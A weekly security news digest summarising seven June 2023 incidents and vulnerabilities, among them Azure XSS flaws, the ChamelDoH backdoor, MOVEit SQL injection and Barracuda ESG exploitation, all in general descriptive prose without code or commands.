06/15/2023-06/21/2023 Vulnerabilities Reported in Microsoft Azure, New Linux Backdoor Utilizing DNS-over-HTTPS Tunneling, Critical Vulnerability in VMware’s Aria Operations Networks And More

1. Severe Vulnerabilities Reported in Microsoft Azure Bastion and Container Registry

Microsoft Azure Bastion and Azure Container Registry have been found to have two critical security vulnerabilities that could be exploited for cross-site scripting (XSS) attacks. Unauthorized access to a victim’s session within the compromised Azure service iframe was possible due to these vulnerabilities, leading to unauthorized data access, modifications, and disruption of Azure services. The flaws leverage a weakness in the postMessage iframe, enabling the injection of malicious JavaScript code through embedded endpoints within remote servers. To exploit these weaknesses, threat actors would need to identify vulnerable endpoints with missing X-Frame-Options headers or weak Content Security Policies (CSPs). By crafting appropriate payloads and manipulating the postMessage handler, the attacker can execute their code within the victim’s context. Orca Security demonstrated proof-of-concept exploits targeting Azure Bastion and Azure Container Registry, manipulating the Topology View SVG exporter and Quick Start to execute XSS payloads.

2. Fake Researcher Profiles Spread Malware through GitHub Repositories as PoC Exploits

Fraudulent GitHub accounts linked to a fake cybersecurity company are pushing malicious repositories. These repositories claim to be proof-of-concept exploits targeting zero-day vulnerabilities in Discord, Google Chrome, and Microsoft Exchange Server. VulnCheck, the discoverer of this activity, found that the perpetrators created a network of fake accounts and Twitter profiles to make their actions seem legitimate. The rogue repositories were first noticed in May when similar exploits for Signal and WhatsApp were released, but those repositories have been taken down. Notably, the accounts also used photos of real security researchers from reputable firms like Rapid7. The Python script used in the proof-of-concept downloads and executes a malicious binary on the victim’s operating system. Despite the effort invested in creating false identities, the malware is easily detectable. The success of the attackers remains uncertain, but their persistent pursuit suggests confidence in their approach.

3. ChamelDoH: New Linux Backdoor Utilizing DNS-over-HTTPS Tunneling for Covert CnC

ChamelGang, a known threat actor, has been using a new Linux backdoor called ChamelDoH. This malware utilizes DNS-over-HTTPS (DoH) tunneling and allows communication via C++ code. ChamelGang was first exposed by Positive Technologies in September 2021, revealing its attacks on various industries across different countries. The actor exploits vulnerabilities in Microsoft Exchange servers and Red Hat JBoss Enterprise Application, using a passive backdoor called DoorMe. Stairwell discovered the Linux backdoor, which captures system information and enables remote access operations. ChamelDoH’s unique feature is its use of DoH to send DNS TXT requests to a rogue nameserver, making it difficult to block as it utilizes commonly used DNS servers like Cloudflare and Google. Additionally, the use of DoH as a command-and-control method prevents interception and detection by security solutions, turning it into an effective encrypted channel for communication.

4. Third Flaw Uncovered in MOVEit Transfer App Amidst Cl0p Ransomware Mass Attack

Progress Software has revealed a third vulnerability in its MOVEit Transfer application, while the Cl0p cybercrime group has resorted to extortion tactics against affected companies. Tracked as CVE-2023-35708, the flaw is an SQL injection vulnerability that can result in escalated privileges and unauthorized access. Progress Software advises customers to disable HTTP and HTTPS traffic on ports 80 and 443 until a fix is ready. This disclosure follows the revelation of SQL injection vulnerabilities (CVE-2023-35036) that provided unauthorized access to the application’s database content. The Cl0p group has already exploited CVE-2023-34362, and they have listed 27 hacked companies on their darknet leak portal, including US federal agencies. Censys reports that MOVEit servers are primarily used in the financial services, healthcare, IT, and government sectors in the US. According to Kaspersky, ransomware comprises 58% of malware-as-a-service (MaaS) attacks, followed by information stealers (24%) and botnets, loaders, and backdoors (18%).

5. Alert! Hackers Exploiting Critical Vulnerability in VMware’s Aria Operations Networks

VMware has warned that an already patched critical command injection vulnerability in Aria Operations for Networks is being actively exploited. The flaw, known as CVE-2023-20887, enables remote code execution through command injection attacks. Versions 6.x of VMware Aria Operations Networks are affected, and fixes were released on June 7, 2023. Although specific details of the attacks are unknown, VMware confirmed real-world exploitation. Threat intelligence firm GreyNoise identified active exploitation from two IP addresses in the Netherlands. The vulnerability was discovered by researcher Sina Kheirkhah, who released a proof-of-concept. The swift exploitation of newly disclosed vulnerabilities remains a significant threat globally. Mandiant also reported active exploitation of another VMware Tools flaw (CVE-2023-20867) by a suspected Chinese actor called UNC3886, resulting in backdoored Windows and Linux hosts.

6. Chinese UNC4841 Group Exploits Zero-Day Flaw in Barracuda Email Security Gateway

A threat actor known as UNC4841has been exploiting a recently patched zero-day vulnerability in Barracuda Email Security Gateway (ESG) appliances since October 2022. The flaw, identified as CVE-2023-2868, allows remote code injection and affects versions 5.1.3.001 through 9.2.0.006. Mandiant, appointed to investigate the hack, describes UNC4841 as an aggressive and skilled espionage group. The actor sent targeted organizations emails with malicious TAR file attachments, disguising them as spam. The goal was to execute a reverse shell payload on the ESG devices and deploy three malware strains, establishing persistence and executing arbitrary commands. UNC4841 leveraged compromised devices for lateral movement and data exfiltration. The attacks targeted private and public sector organizations across 16 countries, with government entities comprising almost a third of the victims.

7. Zyxel Releases Urgent Security Updates for Critical Vulnerability in NAS Devices

Zyxel has released security updates to address a critical vulnerability in its network-attached storage (NAS) devices. Tracked as CVE-2023-27992, the flaw is a pre-authentication command injection vulnerability that could allow remote execution of arbitrary commands on affected systems. Zyxel warns that an unauthenticated attacker could exploit the flaw by sending a crafted HTTP request. The impacted versions include NAS326, NAS540, and NAS542, which have been patched in their respective newer versions. The alert follows recent additions of two Zyxel firewall vulnerabilities to the U.S. Cybersecurity and Infrastructure Security Agency’s Known Exploited Vulnerabilities catalog. Given the increasing targeting of Zyxel devices by threat actors, customers are strongly advised to apply the security updates promptly to mitigate potential risks.